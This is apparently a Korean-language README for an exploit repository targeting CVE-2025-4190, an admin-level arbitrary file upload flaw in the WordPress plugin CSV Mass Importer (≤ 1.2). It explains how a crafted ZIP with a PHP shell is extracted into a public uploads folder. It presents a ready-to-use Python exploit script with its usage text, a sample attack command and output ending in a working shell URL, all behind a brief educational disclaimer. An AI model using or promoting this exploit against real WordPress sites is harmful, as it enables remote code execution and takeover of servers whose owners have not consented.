
CSV Mass Importer <= 1.2 - 관리자+ 임의 파일 업로드
WordPress용 CSV Mass Importer 플러그인(≤ 1.2)에는 Admin+ 임의 파일 업로드 취약점이 있습니다.
업로드된 파일에 대한 검증이 적절하지 않아, 관리자와 같은 고권한 사용자가 서버에 임의 파일을 업로드할 수 있습니다. 이는 예를 들어 멀티사이트 환경처럼 제한되어야 하는 경우에도 가능합니다.
이 취약점으로 공격자는 PHP 셸 또는 악성 파일을 업로드하여 서버에서 원격 코드 실행(RCE) 을 유발할 수 있습니다.
발견자: Nxploited (Khaled Alenazi).
이 플러그인은 CSV 가져오기 기능 사용 시 업로드된 파일을 제대로 검사하지 못합니다.
PHP 셸이 포함된 조작된 ZIP 파일을 업로드하여 공개적으로 접근 가능한 디렉터리에 압축을 풀 수 있습니다.
셸 경로 예시:
<target-url>/wp-content/uploads/cmi-data/nxploited.php
이 저장소에는 바로 사용 가능한 Python 익스플로잇 스크립트인 4190.py가 포함되어 있습니다.
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL
--username, -un USERNAME
WordPress admin username
--password, -p PASSWORD
WordPress admin password
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)
이 코드는 교육 목적으로만 제공됩니다.
저자는 이 스크립트로 인한 오용이나 손해에 대해 책임지지 않습니다.
책임감 있게, 그리고 테스트 권한이 있는 시스템에서만 사용하십시오.
발견 및 개발: Khaled Alenazi (Nxploited) 🌟